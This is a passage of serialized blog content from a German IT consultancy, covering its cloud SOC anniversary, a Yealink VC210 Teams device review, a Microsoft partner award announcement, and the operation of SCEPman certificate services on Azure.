haben in dieser Zeit ",[433,5435,5436],{},"unzählige Angriffe verhindert oder unterbrochen",". Wir haben Attacken forensisch analysiert und daraus Schlussfolgerungen gezogen, wie sie in Zukunft verhindert werden können. Dabei haben wir Tools und Verfahren entwickelt, die allen unseren Kunden helfen.",[353,5439,5440,5441,5444],{},"Die tägliche Arbeit besteht einerseits aus monotonen Aufgaben und anderseits aus spannenden Recherchen im Falle von Angriffen durch Hacker-Gruppen. Sobald ein interessanter Fall auftaucht, stecken oft mehrere Spezialisten virtuell die Köpfe zusammen, um gemeinsam zu rekonstruieren, was passiert ist. Wir versuchen, die monotonen Aufgaben zu reduzieren, indem wir unsere Prozesse und Automatisierungen stetig verbessern. Auch unser eigener Service wird ",[433,5442,5443],{},"evergreen"," gelebt.",[353,5446,5447,5448,5451],{},"Neben der Incident Response und dem Analysieren von Vorfällen bei Malware-, Phishing- und Identity Angriffen haben wir die ",[433,5449,5450],{},"Security Posture"," unserer CSOC Kunden massiv verbessert. So konnten wir beispielsweise den Microsoft Secure Score bei einem Kunden innerhalb von 3 Monaten auf 169% steigern und seine Security Landschaft somit stark optimieren.",[2548,5453,5455],{"id":5454},"ausblick","Ausblick",[353,5457,5458],{},"Wie schon erwähnt: sicher bleibt nicht sicher. Deshalb sind wir dabei, die Dienste des CSOC auf andere Bereiche auszudehnen, zum Beispiel auf das Azure Security Center. Wir stellen auch die Alerts und Sensoren, die täglich überwacht werden, ständig in Frage und sind bereit, sie bei Bedarf anzupassen. Auf diese Weise versuchen wir, unseren Service 'neu' und 'frisch' zu halten, um für unbekannte Bedrohungen perfekt vorbereitet zu sein.",{"title":402,"searchDepth":403,"depth":403,"links":5460},[5461,5462,5463,5464],{"id":5387,"depth":704,"text":5388},{"id":5398,"depth":704,"text":5399},{"id":5409,"depth":704,"text":5410},{"id":5454,"depth":403,"text":5455},{"categories":5466,"blogtitlepic":5467,"socialimg":5468,"customExcerpt":5357},[1117],"head-csoc-celebration","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-csoc-celebration.jpg","2020-05-18","/posts/2020-05-18-ein-jahr-csoc",{"title":5350,"description":5357},"posts/2020-05-18-ein-jahr-csoc",[1117,4707,1521],"8XcPIWLrm8HPAzaZtuaCzja_ipaLqfvFjV103DL7cMQ",{"id":5476,"title":5477,"author":48,"body":5478,"cta":3,"description":5484,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":5595,"moment":5599,"navigation":415,"path":5600,"seo":5601,"stem":5602,"tags":5603,"webcast":406,"__hash__":5604},"content_de/posts/2020-06-10-yealink-vc210-product-review.md","Product Review Yealink VC210 Teams Edition",{"type":350,"value":5479,"toc":5592},[5480,5485,5500,5515,5524,5527,5533,5536,5539,5542,5548,5551,5554,5557,5560,5565,5568,5573,5576,5579,5582,5587,5589],[353,5481,5482],{},[433,5483,5484],{},"Der neue Video Conferencing Endpoint VC210 ist ideal für Huddle- und Small Rooms und darüberhinaus erschwinglich. Mit Microsoft Teams integriert arbeitet es mit der Yealink Freisprecheinrichtung CP900 zusammen und liefert ein erstklassiges Audio- und Videoerlebnis für Teams Meetings in kleinen Räumen. Ein Fazit.",[353,5486,5487,5488,5493,5494,5499],{},"Es ist erstaunlich, wie wichtig Microsoft Teams inzwischen in unserer täglichen Arbeit geworden ist. Teams schafft neue Möglichkeiten der Kommunikation und Zusammenarbeit und gestaltet unsere Arbeitsprozesse neu. Dies wird in Zeiten der durch die Corona-Pandemie verursachten Einschränkungen noch deutlicher. Vor dieser Zeit gehörten geregelte Arbeitszeiten, die tägliche Fahrt ins Büro oder zum Kunden und auch regelmäßige Kaffeepausen mit den Kollegen und Kolleginnen noch zur festen Struktur eines Arbeitstages. Vieles davon ist in dieser Form derzeit nicht möglich und dennoch müssen wir sicherstellen, dass wir unsere Arbeit erledigen und dass wir weiterhin mit unseren Team in einer Weise in Kontakt bleiben, die vielen von uns vor dieser Zeit noch fremd schien. Kurzbesprechungen aus der Vitra Lounge, Team-Meetings von der Dachterrasse oder das Skizzieren auf dem Surface Hub setzen seit langem neue Maßstäbe für ein motivierendes und produktives Arbeitsumfeld, das im Homeoffice seinesgleichen suchte. Die Restriktionen erfordern nun neue Ideen und Ansätze, unseren Arbeitsalltag neu zu gestalten. Gute Beispiele dafür zeigten die ",[374,5489,5492],{"href":5490,"rel":5491},"https://twitter.com/glueckkanja/status/1242839888459976704?s=20",[378],"Impressionen aus dem Homeoffice"," oder die wöchentlichen ",[374,5495,5498],{"href":5496,"rel":5497},"https://www.glueckkanja.com/blog/gk/homeoffice/collaboration/2020/04/kochen-mit-zeba/",[378],"Kochevents via Teams"," zusammen mit den Kollegen und ihren Familien.",[353,5501,5502,5503,5508,5509,5514],{},"An dieser Stelle möchte ich Ihnen den neuen Video Conferencing Endpoint ",[374,5504,5507],{"href":5505,"rel":5506},"https://www.yealink.com/product/video-conferencing-vc210-ms-teams",[378],"VC210 Teams Edition"," vorstellen. Einerseits stellt die Teilnahme an diesen Veranstaltungen nicht nur hohe Anforderungen an die Technik. Qualitativ hochwertige Audio-/Videogeräte sind unverzichtbar und eine stabile und leistungsfähige Netzwerkverbindung ist zwingend erforderlich. Andererseits soll das Ganze, abgesehen von den technischen Aspekten, genauso viel Spaß machen wie im Büro. Diese Punkte kamen mir in den Sinn, als Yealink in einem gemeinsamen Meeting das aktuelle Produktportfolio präsentierte und den VC210 Teams Edition aus der neuen Teams-Geräte-Kategorie ",[374,5510,5513],{"href":5511,"rel":5512},"https://www.microsoft.com/de-de/microsoft-365/microsoft-teams/across-devices/devices/category?devicetype=20&market=de&page=1&filterIds=",[378],"\"Collaboration Bars\""," vorstellte.",[353,5516,5517,5518,5523],{},"Ursprünglich für Huddle- und Small Rooms geschaffen, bietet dieses Gerät in der aktuellen Situation Potenzial für verschiedene Anwendungsfälle. Yealink präsentierte in unserem gemeinsamen Termin ",[374,5519,5522],{"href":5520,"rel":5521},"https://www.yealink.com/solution/remote-work-with-microsoft-teams",[378],"Beispiele aus den unterschiedlichsten Bereichen",". Der Gedanke, in Zukunft Audio- und Videoanrufe aus der bequemen Couchecke mit einem großen Flachbildschirm herausführen zu können, motivierte mich, den VC210 zu testen.",[353,5525,5526],{},"Es dauerte nur wenige Tage, als ein relativ kleines Paket zugestellt wurde. Mit großer Begeisterung öffnete ich den Hauptkarton, der insgesamt drei Einzelkartons enthielt. In dem größeren befand sich die Hauptkomponente, d.h. die Kamera mit integrierter Steuereinheit und in den beiden kleineren die Kabel und die Freisprecheinrichtung.",[353,5528,5529],{},[356,5530],{"alt":5531,"src":5532},"Yealink Equipment","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-yealink-equipment.jpg",[353,5534,5535],{},"Das VC210 kann über Power over Ethernet (PoE) mit Strom versorgt werden, wodurch ein zusätzliches Netzteil eingespart wird und eine direkte Netzwerkverbindung gegenüber einer Verbindung über WLAN definitiv vorzuziehen ist. Yealink fügt der Lieferung auch einen PoE-Adapter bei. Im Lieferumfang enthalten ist ein kompletter Kabelsatz (3m Ethernet, 1,8m HDMI und 5m USB-Verlängerung) und die Freisprecheinrichtung CP900, die mit 6 Mikrofonen und einem Full-Duplex Lautsprecher mit HD-Voice für eine hohe Hör- und Sprechqualität sorgt. Erwähnenswert sind hier auch die Fernbedienung (VCR20-MS) und eine Sichtschutzhülle für die Kamera. Batterien für die Fernbedienung und Textilkabelbinder vervollständigen die Lieferung.",[353,5537,5538],{},"Es braucht nicht viel, um diese Komponenten miteinander zu verbinden. Die Kamera und Steuereinheit kann einfach auf den oberen Rand des Flachbildschirms gelegt und im richtigen Winkel ausgerichtet werden. Daran werden das LAN-Kabel für den Netzwerkanschluss, das HDMI-Kabel für den Anschluss an den Fernseher und das USB-Kabel für die Freisprecheinrichtung angeschlossen. Die Kamera verfügt außerdem über ein Stativgewinde, mit dem sie an einem TV-Stativ oder einer Wandhalterung befestigt werden kann.",[353,5540,5541],{},"Nach der kurzen Aufbauphase wollte ich das Potenzial der Collaboration Bar kennen lernen. Das einfache Einschalten des Fernsehers genügt, um sofort mit dem Menü Spracheinstellungen begrüßt zu werden. Schnell die Sprache auf English gesetzt und mittels Remote Control bestätigt.",[353,5543,5544],{},[356,5545],{"alt":5546,"src":5547},"Yealink Language und Remote Control","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-yealink-language-remote-control.jpg",[353,5549,5550],{},"Das VC210 kann auch über den Fernsehbildschirm bedient werden, sofern dieser Touch unterstützt. Dieser Luxus bleibt mir in meinem Homeoffice verwehrt, aber halb so schlimm, denn die kleine VCR20 macht einen hochwertigen Eindruck und lässt offensichtlich auch eine strukturierte und unkomplizierte Steuerung zu.",[353,5552,5553],{},"Auch der unmittelbar darauf folgende Anmeldevorgang ist über die Fernbedienung unkompliziert. Die Passworteingabe kann man sich dank Web-Devicelogins schenken, wäre aber mittels Bildschirmtastatur problemlos möglich. Da wir die kennwortlose Anmeldung verwenden, könnte ich die Anmeldung einfach über die Authenticator App auf meinem iPhone bestätigen.",[353,5555,5556],{},"Normalerweise wäre es ein Grund zum Feiern, in den nächsten Stunden kein Meeting zu haben, doch für die weiteren Tests musste natürlich ein Meeting her.",[353,5558,5559],{},"Schnell über den Button „New Meeting“ meinen Testuser Luke zu einem Ad-Hoc Meeting hinzugefügt, um die Bedienung und die Möglichkeiten kennenzulernen. Nach einer kurzen Test- und Herumspielphase wird klar, alles nicht sonderlich kompliziert, und der Teilnahme mit der Collaboration Bar am ersten „produktiven“ Meeting steht nichts mehr im Wege. Dafür habe ich meinen Testuser via Outlook zu einem festen Teams Meeting eingeladen.",[353,5561,5562],{},[356,5563],{"alt":5546,"src":5564},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-yealink-teams.jpg",[353,5566,5567],{},"Mein Testuser teilte eine Präsentation, die auf dem 40“ Bildschirm aus der Distanz von ca. 2-3 m gut sichtbar war. Dabei ist auf der rechten Seite noch genügend Platz, um die Videostreams der anderen Teilnehmer zu sehen. Im eigenen Stream lässt sich gut erkennen, welche Inhalte man gerade von sich selbst zeigt, denn dank der automatischen Bildeinstellung folgt einem die Kamera im Rahmen des 120-Grad-Weitwinkelobjektivs auf Schritt und Tritt.",[353,5569,5570],{},[356,5571],{"alt":5546,"src":5572},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/images-yealink-live-meeting.jpg",[353,5574,5575],{},"Spannend auch die Möglichkeit parallel z.B. mit der mobilen App am iPad an dem Meeting teilzunehmen, um beispielsweise über die Whiteboard App gemeinsam an kreativen Inhalte zu arbeiten. Eine nette Lösung, auch wenn deutlich wurde, dass eine Teilnahme ohne ein zusätzliches Arbeitsmittel nicht optimal ist. Auch die Verwendung eines Headsets könnte unter diesen Umständen ein Vorteil gegenüber \"Freisprechen\" sein.",[353,5577,5578],{},"Ein Blick auf die Administration zeigt, dass das Device einfach zu managen ist. Einerseits bietet es eine eigene administrative Oberfläche, auf der Einstellungen ausgelesen und konfiguriert werden können. Auf der anderen Seite kann es auch vollständig ferngesteuert werden.",[353,5580,5581],{},"Erwähnenswert ist hier auch die Kategorie \"Collaboration Bars\" im Teams Admin Center unter \"Devices\". Hier können, ähnlich wie in der Kategorie \"Phone Devices\", Statusinformationen abgerufen, Software- und Firmware-Updates sowie ein Geräteneustart initiiert und zu Analysezwecken z.B. Geräteprotokolle heruntergeladen werden.",[353,5583,5584],{},[356,5585],{"alt":5546,"src":5586},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-yealink-admin.jpg",[2548,5588,1088],{"id":1087},[353,5590,5591],{},"Ich mach's kurz – 3-2-1-Meins!!! Spaß beiseite, das Gerät macht auf jeden Fall Spaß und schafft gerade zu Zeiten im Homeoffice, eine neue Möglichkeit an Meetings fernab seines regulären Arbeitsplatzes teilzunehmen. Das erfordert natürlich den Platz dafür zu Hause und nutzt die Vorteile eher in den Besprechungen, in denen man keine weiteren Arbeitsmittel benötigt. Die Dokumentation von Besprechungsinhalten oder die Präsentation eigener Inhalte erfordert schnell ein zusätzliches Gerät. Das Beispiel mit dem iPad zeigt eine gelungene Kombination, aber wahrscheinlich bietet der Arbeitslaptop mit angeschlossener Videokamera und Headset die größere Flexibilität. Das Gerät schöpft sein volles Potenzial eher in kleineren Meetingräumen oder Huddle Spaces aus, in denen 2-3 Personen gemeinsam an einem Thema remote mit anderen Teilnehmern zusammenarbeiten. Hier empfiehlt es sich, ein touchfähiges Display zu verwenden, da die Fernbedienung, so gut sie auch sein mag, etwas sperrig ist. Alles in allem zeigt Yealink mit der VC210 Teams Edition, dass die Kategorie \"Collaboration Bars\" einfache Möglichkeiten der Zusammenarbeit schafft, ohne direkt in die teurere Kategorie der Microsoft Teams Rooms (MTR) investieren zu müssen. Aus meiner Sicht darf es daher gerne den Nickname MTR \"mini\" erhalten.",{"title":402,"searchDepth":403,"depth":403,"links":5593},[5594],{"id":1087,"depth":403,"text":1088},{"categories":5596,"blogtitlepic":5597,"socialimg":5598,"customExcerpt":5484},[534],"head-yealink-overview-blur","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-yealink-overview-blur.jpg","2020-06-10","/posts/2020-06-10-yealink-vc210-product-review",{"title":5477,"description":5484},"posts/2020-06-10-yealink-vc210-product-review",[534,964,1408],"x9e_F3M-A9MohtoP9L9Rq6835zS1e1K8Sj4aVjrXknI",{"id":5606,"title":5607,"author":191,"body":5608,"cta":3,"description":5614,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":5669,"moment":5674,"navigation":415,"path":5675,"seo":5676,"stem":5677,"tags":5678,"webcast":406,"__hash__":5679},"content_de/posts/2020-07-13-gk-microsoft-partner-of-the-year.md","Glück & Kanja ist Microsoft Partner of the Year Finalist Security",{"type":350,"value":5609,"toc":5667},[5610,5615,5625,5631,5640,5647,5658,5661],[353,5611,5612],{},[433,5613,5614],{},"Glück & Kanja Consulting AG wird als Microsoft Partner of the Year Finalist 'Security and Compliance' ausgezeichnet.",[353,5616,5617,5618,5621,5622,456],{},"Microsoft gab heute bekannt, die Glück & Kanja Consulting AG, eines der führenden IT-Beratungsunternehmen und einer der Top-Partner von Microsoft in Deutschland, als ",[433,5619,5620],{},"Finalist für den Microsoft Partner of the Year Award 2020 in der Kategorie 'Security and Compliance'"," auszuzeichnen. Damit konnte sich das Unternehmen nach 2017 und 2019 erneut gegen ein starkes Teilnehmerfeld unter den weltweiten Microsoft Partnern behaupten. Beste Voraussetzungen also für den kürzlich angekündigten Zusammenschluss mit der GAB zum Cloud Managed Service Provider ",[433,5623,5624],{},"glueckkanja AG",[353,5626,5627],{},[356,5628],{"alt":5629,"src":5630},"Microsoft Partner of the Year Award 2020 Finalist","https://res.cloudinary.com/c4a8/image/upload/logos/ms-logo-2020POYFinalist.png",[353,5632,5633,5634,5639],{},"Christian Kanja, Vorstand der Glück & Kanja, freut sich über die wiederholte Auszeichnung aus Redmond: “Wir freuen uns wahnsinnig, dass unserer ",[374,5635,5638],{"href":5636,"rel":5637},"https://glueckkanja.com/de/portfolio/cloud-security-operations-center/",[378],"Cloud Security Operations Center (CSOC)"," die Microsoft Jury überzeugen konnte. Mit unserer 100 % Cloud Blueprint Architektur in Kombination mit dem umfangreichen Microsoft E5 Security Stack können wir nicht nur einen aus der Cloud verwalteten Arbeitsplatz zur Verfügung stellen, sondern ihn zusätzlich mit einer stets aktuellen und lückenlosen Cloud-Sicherheitsstrategie versorgen.“",[353,5641,5642,5643,5646],{},"Der ",[433,5644,5645],{},"CSOC Managed Service"," liefert durch seine von Glück & Kanja selbstentwickelten Companion-Komponenten basierend auf der Microsoft Graph API sowohl Multi-Tenant Analysen als auch garantiert er schnelle 24x7-Reaktionszeiten für alle Arten von Security-Incidents. Für seine fast 12.000 Windows 10 Modern Workplace-Clients und die Sicherheit von Azure AD Identity Protection, Office ATP, Defender ATP, TVM und MCAS entschied sich u.a. das internationale Energieunternehmen UNIPER für diesen Service.",[353,5648,5649,5650,5653,5654,5657],{},"Neben regelmäßigen Bedrohungen kam es zu einer unerwarteten ",[433,5651,5652],{},"Feuerprobe für den CSOC-Dienst",", als sich COVID-19 weiter ausbreitete. Die meisten der 12.000 Arbeitsplätze von UNIPER arbeiten jetzt remote, und der Schutz, den die Sicherheitstools von Microsoft 365 bieten, wäre in traditionellen Infrastrukturen unmöglich gewesen. „In dieser Zeit der ",[433,5655,5656],{},"COVID-19-Pandemie"," müssen wir die Sicherheit unserer gesamten Microsoft-365-Infrastruktur und unserer Arbeitsplätze gewährleisten. Umso mehr schätzen wir die Unterstützung durch das Cloud Security Operations Center von Glück & Kanja. Es bietet eine kontinuierliche Überwachung der Gesamtsicherheit, den Umgang mit Cyber-Bedrohungen und bringt kontinuierlich nachhaltige Verbesserungen ein“, sagt Tilmann Proske, Head of Enterprise Information Security bei UNIPER.",[353,5659,5660],{},"“Es ist uns eine Ehre, die Gewinner und Finalisten der 2020 Microsoft Partner of the Year Awards zu würdigen“, sagte Gavriella Schuster, Corporate Vice President, One Commercial Partner, Microsoft.",[353,5662,5642,5663,5666],{},[433,5664,5665],{},"Microsoft Partner of the Year Award"," wird jährlich an Microsoft Partner vergeben, die sich deutlich mit innovativen und vor allem erfolgreichen Lösungen und Projekten bewiesen haben.",{"title":402,"searchDepth":403,"depth":403,"links":5668},[],{"categories":5670,"blogtitlepic":5671,"socialimg":5672,"customExcerpt":5673},[410],"head-csoc-discussion","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-csoc-discussion.jpg","Microsoft gab bekannt, die Glück & Kanja Consulting AG als Finalist für den Microsoft Partner of the Year Award 2020 in der Kategorie ‘Security and Compliance’ auszuzeichnen. Das Unternehmen konnte mit seinem Cloud Security Operations Center die Microsoft Jury überzeugen.","2020-07-13","/posts/2020-07-13-gk-microsoft-partner-of-the-year",{"title":5607,"description":5614},"posts/2020-07-13-gk-microsoft-partner-of-the-year",[3933,3934,422],"T1FG_Tamo5ANTBysdHaQWYK4oNXuTQtLFP0CQE15-5Q",{"id":5681,"title":5682,"author":176,"body":5683,"cta":3,"description":5689,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":5893,"moment":5897,"navigation":415,"path":5898,"seo":5899,"stem":5900,"tags":5901,"webcast":406,"__hash__":5902},"content_de/posts/2020-07-31-scepman-im-einsatz.md","SCEPman im produktiven Einsatz",{"type":350,"value":5684,"toc":5882},[5685,5690,5704,5708,5723,5727,5730,5734,5751,5755,5758,5761,5764,5768,5771,5785,5789,5798,5804,5809,5812,5815,5829,5832,5835,5842,5845,5852,5856,5871,5873],[353,5686,5687],{},[433,5688,5689],{},"Dank SCEPman können Zertifikate schnell und unkompliziert an Endgeräte verteilt werden. Wenngleich es sich um einen Cloud-Dienst handelt, sollte der produktive Einsatz gut geplant sein und erfordert minimalen operativen Aufwand.",[353,5691,5692,5693,5697,5698,5703],{},"100 % Cloud, Simplicity, Light Management - Begriffe, die ich immer wieder verwende, wenn ich mit Kunden über den Future Workplace spreche. Wie passt das Thema PKI dazu? Die gleiche Frage haben wir uns auch gestellt und uns der Herausforderung angenommen. Seit über einem Jahr haben wir ",[374,5694,3631],{"href":5695,"rel":5696},"https://scepman.com/",[378]," jetzt in unserem Produkt-Portfolio und beweisen damit, dass die eingangs erwähnten Begriffe und das Thema Zertifikate sich nicht widersprechen. Sollten Sie SCEPman noch nicht kennen und möchten mehr über die genaue Funktionsweise erfahren, sehen Sie sich unser YouTube Video ",[374,5699,5702],{"href":5700,"rel":5701},"https://youtu.be/bISIcC8IEB4",[378],"Network-Access 4.0"," an.",[2548,5705,5707],{"id":5706},"bereitstellen-von-scepman","Bereitstellen von SCEPman",[353,5709,5710,5711,5716,5717,5722],{},"Um unseren Schlagwörtern (100 % Cloud, Simplicity, Light Management) gerecht zu werden, haben wir das Produkt so ausgelegt, dass jeder mit einem Microsoft Azure Abonnement innerhalb weniger Minuten ein SCEPman System erstellen kann. Über den ",[374,5712,5715],{"href":5713,"rel":5714},"https://www.glueckkanja.com/marketplace/scepman",[378],"Azure Marketplace"," wird das Produkt mit Hilfe einer ",[374,5718,5721],{"href":5719,"rel":5720},"https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview",[378],"Azure Resource Manager Vorlage"," bereitgestellt. In Summe braucht die Implementierung selten mehr als 10 Minuten, und man kann sofort Zertifikate aus der Cloud an seine Endgeräte verteilen. Genau hier ist der Dreh- und Angelpunkt: Die Bereitstellung ist außergewöhnlich einfach und schnell, doch in den meisten Szenarien wird SCEPman Teil von sensiblen Anwendungsgebieten. Zum Beispiel werden die Zertifikate für den Netzwerkzugriff oder beim Aufbau von VPN-Verbindungen genutzt. Hier darf auf keinen Fall etwas schief gehen. Wenn plötzlich Tausende von Mitarbeitern auf der ganzen Welt nicht mehr ins Unternehmensnetzwerk gelangen oder keinen Zugang zu ihrer primären Businessanwendung haben, verlieren unsere Schlagwörter ihre Bedeutung. Daher ist es auch bei einem Cloud-Service so wichtig, auf die Architektur und den Betrieb zu achten.",[2548,5724,5726],{"id":5725},"betrieb-von-cloud-diensten","Betrieb von Cloud-Diensten",[353,5728,5729],{},"Es ist ein weit verbreiteter Irrglaube, dass Cloud-Dienste ohne Planung und Betreuung auskommen. Zum Glück wurde in den letzten Jahren damit aufgeräumt. Die Cloud macht uns das Leben in vielen Bereichen einfacher, und mit modernsten Technologien soll der IT-Betrieb entlastet werden. Damit das aber auch funktioniert, muss man sich schon im Voraus Gedanken über die Architektur machen und je nach Anforderung des Dienstes auch eine Betreuung organisieren. SCEPman bildet da keine Ausnahme, denn wir bieten das Produkt bewusst nicht als eine von Glück & Kanja gemanagte Lösung an (Software-as-a-Service), sondern geben unseren Kunden die Möglichkeit, es selbst auf der Azure-Plattform zu betreiben (Platform-as-a-Service). Schließlich ist SCEPman ein Schlüsselmanagementsystem, das mit besonderen Sicherheitsanforderungen verbunden ist. Bei dem von uns gewählten Platform-as-a-Service (PaaS)-Modell hat der Kunde die volle Kontrolle über sein Zertifikatsmanagement und behält die Datenhoheit. Daher ist es jedoch unvermeidlich, dass der Kunde auch den Betrieb berücksichtigen muss.",[2548,5731,5733],{"id":5732},"scepman-betrieb-im-detail","SCEPman Betrieb im Detail",[353,5735,5736,5737,5740,5741,2454,5744,993,5747,5750],{},"Was heißt das nun konkret? Die Infrastruktur ist durch die Azure Plattform gegeben, und wir nutzen verschiedenen ",[433,5738,5739],{},"PaaS","-Dienste für den SCEPman. Über die Vorlage werden automatisch die Ressourcen ",[433,5742,5743],{},"App-Service",[433,5745,5746],{},"App-Service-Plan",[433,5748,5749],{},"Key Vault"," erstellt.",[629,5752,5754],{"id":5753},"app-service-app-service-plan","App-Service & App-Service-Plan",[353,5756,5757],{},"Bei diesen beiden Ressourcen handelt es sich mehr oder weniger um einen Cloud-Dienst. Der App-Service-Plan stellt einen virtuellen Rahmen zur Verwaltung der Leistungs- und Abrechnungsparameter zur Verfügung (Rechenleistung, Arbeitsspeicher, etc.), über den ein oder auch mehrere App-Services betrieben werden können. Diese stellen dabei dann eine Webseite oder Anwendung dar. Und genau in einem solchen App-Service wird unser SCEPman Programmcode ausgeführt. Microsoft garantiert für die App-Services eine Verfügbarkeit von 99,95 %.",[629,5759,5749],{"id":5760},"key-vault",[353,5762,5763],{},"Der Key Vault ist zusammen mit dem Azure AD und Intune Teil des SCEPman Backends. Innerhalb des Key Vaults liegt das Root-Zertifikat. Für die Validierung und Ausstellung von Zertifikaten nutzt SCEPman (App-Service) die Key Vault API. Microsoft garantiert hier eine Verfügbarkeit von 99,9 %. Die Standardvorlage gewährleistet also bereits eine gute Verfügbarkeit. Eine höhere garantierte Verfügbarkeit kann nur durch die Vervielfältigung der Dienste erreicht werden.",[629,5765,5767],{"id":5766},"weitere-themen-für-den-betrieb","Weitere Themen für den Betrieb",[353,5769,5770],{},"Nachdem wir uns nun mit den grundlegenden Diensten befasst haben, wenden wir uns Themen zu, die für den Betrieb relevant sind:",[367,5772,5773,5776,5779,5782],{},[370,5774,5775],{},"Überwachung und Analyse",[370,5777,5778],{},"Lastverteilung",[370,5780,5781],{},"Hochverfügbarkeit oder Geo-Redundanz",[370,5783,5784],{},"Absicherung der Zugriffspunkte",[5786,5787,5775],"h4",{"id":5788},"überwachung-und-analyse",[353,5790,5791,5792,993,5795,456],{},"Zur Überwachung und Analyse unserer App-Services stellt Microsoft verschiedene Komponenten zur Verfügung. Zwei davon sind ",[433,5793,5794],{},"Application Insights",[433,5796,5797],{},"Azure Monitor",[353,5799,5800,5801,5803],{},"Mithilfe der ",[433,5802,5794],{}," können wir sowohl Performance-Daten unserer Anwendung einsehen, als auch dank des integrierten Profilers die genaue Verarbeitung von Anfragen im Code analysieren. Mittels dieser Funktionen können die Leistungsanforderungen für den App-Service bestimmt und überwacht werden, als auch im Fehlerfall detaillierte Analysen gefahren werden.",[353,5805,5642,5806,5808],{},[433,5807,5797],{}," bietet neben den Metriken der Anwendung auch die Möglichkeit, aktiv Mitteilungen zu versenden und integriert sich in die Skalierungsfunktion des App-Service-Plans. Dazu im nächsten Abschnitt mehr.",[5786,5810,5778],{"id":5811},"lastverteilung",[353,5813,5814],{},"Neben dem Ausstellen der Zertifikate ist SCEPman auch für die Validierung der OCSP-Anfragen (Online Certificate Status Protocol) zuständig. Je nach Anzahl der Endgeräte und Zertifikate sowie abhängig vom Einsatzszenario können an einem Tag mehrere zehntausend Anfragen zusammenkommen. Dank der Azure Plattform haben wir die Möglichkeit, beim Thema Lastverteilung sehr flexibel zu agieren.",[353,5816,5817,5818,5821,5822,5825,5826,5828],{},"Anders als bei klassischen Serversystemen nimmt Microsoft uns das Thema der Lastverteilung mit den ",[433,5819,5820],{},"App-Service-Plänen"," ab. Innerhalb eines App-Service-Plans können die verfügbaren Leistungsparameter dynamisch verändert werden, und Microsoft stellt vollkommen transparent für die eigentliche Anwendung (App-Service) die Ressourcen zur Verfügung. Das Ganze kann dank der ",[433,5823,5824],{},"Autoscaling"," Funktion vollkommen automatisiert und flexibel gestaltet werden. Auf Basis der vom ",[433,5827,5797],{}," gesammelten Metriken kann der App-Service-Plan hoch oder runter skaliert werden.",[5786,5830,5781],{"id":5831},"hochverfügbarkeit-oder-geo-redundanz",[353,5833,5834],{},"Dank der Azure Plattform stellen wir bereits mit einer einfachen Implementierung eine gute Verfügbarkeit des SCEPman sicher. Bleibt die Frage, wie hochverfügbar die Anwendung sein muss? Das kann jedes Unternehmen nur für sich selbst beantworten. Die andere Frage ist, wie man mit dem Thema Geo-Redundanz umgeht? Bei einer Nutzung von Zertifikaten für den weltweiten Netzwerkzugang, muss das Thema Latenzen berücksichtigt werden, denn niemand möchte minutenlang warten, bis die WLAN-Verbindung aufgebaut wurde. Das Gute ist, wenn man über Geo-Redundanz spricht, wird zeitgleich auch das Thema Hochverfügbarkeit behandelt. Hierbei nutzen wir eine Microsoft Technologie, die uns das Leben vereinfacht.",[353,5836,5837,5838,5841],{},"Mithilfe des ",[433,5839,5840],{},"Traffic Managers",", einem Dienst der DNS basiert Anfragen an unterschiedliche Endpunkte verteilt, können wir beide Themen vollkommen transparent für die Anwendung behandeln. Die SCEPman Dienste werden in zwei unterschiedlichen Azure Rechenzentren bereitgestellt. Somit können auf Basis verschiedener Kriterien die Anfragen umgeleitet werden, beispielsweise ortabhängig, wobei der Traffic Manager immer den Endpunkt mit der geringsten Latenz zum Endgerät zurückgibt. Zusätzlich überwacht der Traffic Manager die Endpunkte. Wenn einer der Endpunkte nicht erreichbar ist, werden alle Anfragen automatisch an einen anderen Endpunkt verwiesen, und damit ist wieder die Hochverfügbarkeit abgedeckt.",[5786,5843,5784],{"id":5844},"absicherung-der-zugriffspunkte",[353,5846,5847,5848,5851],{},"Im Standard hat Microsoft viel für die Sicherheit von App-Services getan und bietet mit seinen Sicherheitsfunktionen eine gute Basis. Trotzdem kann es Sinn machen, weitere Sicherheitsebenen einzuführen. An dieser Stelle kommt die ",[433,5849,5850],{},"Azure Web Application Firewall"," zum Einsatz. Auch hier wieder ein Microsoft Azure Dienst, der schnell und unkompliziert weitere Sicherheits- und Überwachungsfunktionen bietet. Hierbei ist allerdings zu beachten, dass ein solches Gateway Einfluss auf die Verarbeitungszeit haben kann: jeder Datenfluss zu meinem App-Service wird durch die Firewall geleitet und zusätzlich analysiert. Der Bedarf einer derartigen Sicherheitsebene muss gut überlegt werden, denn der SCEPman hält selbst keine Daten vor, die einfach abgegriffen werden können. Er greift auf weitere Microsoft API-Endpunkte zurück. Somit müssen die Szenarien, gegen die eine derartige Firewall schützen soll, gut abgewogen und nicht einfach eingesetzt werden.",[2548,5853,5855],{"id":5854},"ausblick-in-die-zukunft","Ausblick in die Zukunft",[353,5857,5858,5859,5862,5863,5866,5867,5870],{},"Wir haben uns bewusst für die Microsoft Azure Plattform entschieden und haben unser Produkt nicht nur auf, sondern vor allem in der Plattform entwickelt. Eng mit den Microsoft Produkten verwoben, zeigt die Lösung das Partnerschaft auch auf der technologischen Ebene gelebt werden muss. Doch wie geht es mit SCEPman zukünftig weiter? Wir hören nicht auf, uns weitere Gedanken zu machen, wie wir mit SCEPman einen vollwertigen Ersatz für klassische PKI-Systeme bieten können. Genau deshalb ist es so wichtig, sich vorab Gedanken über den Betrieb zu machen. Werden Zertifikate beispielsweise nicht nur über Intune sondern auch über ",[433,5860,5861],{},"Jamf Pro"," verteilt, bekommt die Lösung eine noch größere Bedeutung. Oder Zertifikate werden für den ",[433,5864,5865],{},"Microsoft Domain Controller"," ausgestellt, um das Thema Authentifizierung von ",[433,5868,5869],{},"Azure AD joined","-Geräten gegen on-premises Ressourcen zu vereinfachen. Wie Sie sehen, gehen uns die Ideen nicht aus, und wir arbeiten fleißig an den nächsten Funktionen.",[2548,5872,1088],{"id":1087},[353,5874,5875,5876,5881],{},"Eines ist klar: Auch wenn 